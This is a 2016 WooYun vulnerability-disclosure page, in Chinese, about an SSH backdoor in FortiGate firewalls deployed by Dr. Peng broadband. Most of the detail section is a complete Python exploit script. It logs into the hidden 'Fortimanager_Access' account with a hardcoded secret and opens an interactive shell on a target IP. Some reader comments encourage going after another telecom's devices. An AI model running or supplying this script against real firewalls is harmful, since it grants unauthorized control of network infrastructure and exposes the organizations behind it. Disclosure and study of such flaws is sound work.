当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169505

漏洞标题:鹏博士宽带FortiGate防火墙存在SSH后门(附脚本)

相关厂商:Fortinet

漏洞作者: 路人甲

提交时间:2016-01-13 14:09

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-13: 细节已通知厂商并且等待厂商处理中
2016-01-15: 厂商已经确认,细节仅向厂商公开
2016-01-25: 细节向核心白帽子及相关领域专家公开
2016-02-04: 细节向普通白帽子公开
2016-02-14: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

鹏博士宽带FortiGate防火墙存在SSH后门,可进行操作

详细说明:

FortiGate防火墙正常的访问方式是通过web,地址为**.**.**.**/login

登录.jpg


但是可以通过SSH后门的形式进行访问操作。
这里感谢Matt兄弟的脚本。进入后门可以对防火墙进行一系列的操作,这里为了不影响正常业务,只验证问题,做了show等操作。

FortiGate查看-1.jpg


FortiGate查看-2.jpg


附上Matt牛的脚本。

#!/usr/bin/env python
# SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
# Usage: ./fgt_ssh_backdoor.py <target-ip>
import socket
import select
import sys
import paramiko
from paramiko.py3compat import u
import base64
import hashlib
import termios
import tty
def custom_handler(title, instructions, prompt_list):
    n = prompt_list[0][0]
    m = hashlib.sha1()
    m.update('\x00' * 12)
    m.update(n + 'FGTAbc11*xy+Qqz27')
    m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
    h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
    return [h]
def main():
    if len(sys.argv) < 2:
        print 'Usage: ' + sys.argv[0] + ' <target-ip>'
        exit(-1)
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False)
    except paramiko.ssh_exception.SSHException:
        pass
    trans = client.get_transport()
    try:
        trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
    except paramiko.ssh_exception.AuthenticationException:
        pass
    trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler)
    chan = client.invoke_shell()
    oldtty = termios.tcgetattr(sys.stdin)
    try:
        tty.setraw(sys.stdin.fileno())
        tty.setcbreak(sys.stdin.fileno())
        chan.settimeout(0.0)
        while True:
            r, w, e = select.select([chan, sys.stdin], [], [])
            if chan in r:
                try:
                    x = u(chan.recv(1024))
                    if len(x) == 0:
                        sys.stdout.write('\r\n*** EOF\r\n')
                        break
                    sys.stdout.write(x)
                    sys.stdout.flush()
                except socket.timeout:
                    pass
            if sys.stdin in r:
                x = sys.stdin.read(1)
                if len(x) == 0:
                    break
                chan.send(x)
    finally:
        termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
if __name__ == '__main__':
    main()

漏洞证明:

FortiGate查看-1.jpg


FortiGate查看-2.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-15 18:14

厂商回复:

CNVD未直接复现所述情况,已由CNVD通过以往建立的处置渠道向网站管理方通报,由其后续提供解决方案。

最新状态:

暂无

漏洞评价:

评价

  1. 2016-01-13 10:56 | king7 ( 普通白帽子 | Rank:1623 漏洞数:237 )

    开播了~~

  2. 2016-01-13 10:57 | k0_pwn ( 实习白帽子 | Rank:96 漏洞数:13 | 专注且自由)

    这也太快了,哈哈哈

  3. 2016-01-13 10:57 | 风若新 ( 普通白帽子 | Rank:222 漏洞数:59 | 爱生活,爱安全,爱攻防。)

    我就知道有人开始搞了!

  4. 2016-01-13 11:17 | 米怀特 ( 路人 | Rank:4 漏洞数:1 | 安全真的安全么?)

    还有一个电信的可以搞一下。

  5. 2016-01-13 11:54 | 龍 、 ( 普通白帽子 | Rank:442 漏洞数:154 | 你若安好 我就是晴天)

    还有一个电信的可以搞一下。

  6. 2016-01-13 11:57 | 一只猿 ( 普通白帽子 | Rank:509 漏洞数:92 | 硬件与无线通信研究方向)

    还有一个电信的可以搞一下。

  7. 2016-01-13 14:35 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1850 漏洞数:296 | 风暴网络安全空间:http://www.heysec.or...)

    鹏博士还存在一个非常严重的问题哦,非WEB漏洞

  8. 2016-01-13 15:58 | fakeidentity ( 路人 | Rank:19 漏洞数:7 | 既然给了我天空,那还束缚我干吗)

    账号的名称也够可以,跟乌云多大的怨恨!